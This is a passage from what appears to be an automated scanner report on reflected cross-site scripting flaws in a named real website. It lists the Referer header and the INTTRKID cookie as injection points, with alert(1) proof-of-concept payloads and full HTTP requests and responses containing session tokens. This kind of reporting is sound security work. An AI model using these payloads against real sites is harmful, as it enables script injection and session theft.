-2c57db5b6505cf0d-573DFF71-CDDF-99B4-914EC1C17055E0E3&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryString=&ReferringPage=http://www.google.com/search?hl=en|q=cfc61"><a>df27a28e5f0&Language=en&Browser=MSIE&BrowserVersion= 7.0&UserID=13832123-2c57db5b6505cf0d-573DFF71-CDDF-99B4-914EC1C17055E0E3&UniqueVistor=Yes&IPAddress=173.193.214.243&Test=No&Comment=" width="1" height="1" bord
...[SNIP]...

1.6. http://www.abbott-langer.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afb54"-alert(1)-"668a970d178 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.abbott-langer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=afb54"-alert(1)-"668a970d178

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:42:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=13832177;expires=Sun, 26-May-2041 20:42:41 GMT;path=/
Set-Cookie: CFTOKEN=3b70f75804a3ac43-573E557F-D0C1-1EB6-A5F9B118524D42EA;expires=Sun, 26-May-2041 20:42:41 GMT;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: CFID=13832177;path=/
Set-Cookie: CFTOKEN=3b70f75804a3ac43%2D573E557F%2DD0C1%2D1EB6%2DA5F9B118524D42EA;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=13832177%2D3b70f75804a3ac43%2D573E557F%2DD0C1%2D1EB6%2DA5F9B118524D42EA%7C%7C06%2F03%2F2011%2001%3A42%3A41%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
t language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","","http://www.google.com/search?hl=en|q=afb54"-alert(1)-"668a970d178","en","MSIE"," 7.0","13832177-3b70f75804a3ac43-573E557F-D0C1-1EB6-A5F9B118524D42EA","Yes","173.193.214.243","No","");</script>
...[SNIP]...

1.7. http://www.abbott-langer.com/index.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae34"><a>42d6f262f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8ae34"><a>42d6f262f5
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.2.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=; SESSIONCOOKIETEST=testing123; PERSISTENTCOOKIETEST=testing123; __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1; __UTMB=92019530%2E1%2E10%2E1307134120; __UTMC=92019530; __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 21:15:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2002%3A15%3A11%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryString=&ReferringPage=http://www.google.com/search?hl=en|q=8ae34"><a>42d6f262f5&Language=en-us&Browser=&BrowserVersion=&UserID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&UniqueVistor=No&IPAddress=173.193.214.243&Test=No&Comment=" width="1" height="1" border="0">
...[SNIP]...

1.8. http://www.abbott-langer.com/index.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e00cc"-alert(1)-"6ca1079b748 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e00cc"-alert(1)-"6ca1079b748
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.2.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=; SESSIONCOOKIETEST=testing123; PERSISTENTCOOKIETEST=testing123; __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1; __UTMB=92019530%2E1%2E10%2E1307134120; __UTMC=92019530; __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 21:17:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2002%3A17%3A02%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
t language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","","http://www.google.com/search?hl=en|q=e00cc"-alert(1)-"6ca1079b748","en-us","","","5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8","No","173.193.214.243","No","");</script>
...[SNIP]...

1.9. http://www.abbott-langer.com/index.cfm [INTTRKID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The value of the INTTRKID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b42"onerror%3d"alert(1)"0a41ec0de0b was submitted in the INTTRKID cookie. This input was echoed as 55b42"onerror="alert(1)"0a41ec0de0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=55b42"onerror%3d"alert(1)"0a41ec0de0b; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:57:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=55b42%22onerror%3D%22alert%281%29%220a41ec0de0b;path=/
Set-Cookie: INTTRKID=55b42%22onerror%3D%22alert%281%29%220a41ec0de0b;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: INTTRKID=55b42%22onerror%3D%22alert%281%29%220a41ec0de0b;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
